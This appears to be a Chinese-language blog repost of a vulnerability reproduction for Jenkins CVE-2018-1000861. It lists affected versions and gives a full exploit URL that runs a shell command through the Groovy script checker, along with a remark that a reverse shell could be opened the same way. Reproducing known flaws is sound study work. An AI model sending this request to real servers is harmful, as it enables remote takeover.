Jenkins遠程命令執行漏洞(CVE-2018-1000861)


漏洞介紹

Stapler Web框架中的釘書機/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一個代碼執行漏洞,攻擊者可以使用該方法調用某些方法通過訪問並非旨在通過這種方式調用的特制URL來訪問Java對象。

影響版本

Jenkins 2.153及更早版本,LTS 2.138.3及更早版本

復現過程

訪問有Jenkins遠程命令執行漏洞(CVE-2018-1000861)的網站首頁

 

 構建特定的url進行命令執行,如在/tmp目錄下創建shell文件

http://192.168.222.196:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/shell%22.execute()}}

執行之后可看到沒有回顯,看一下搭建漏洞環境的主機/tmp目錄下成功創建shell文件

 

 

注意:可執行反彈shell的命令getshell

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM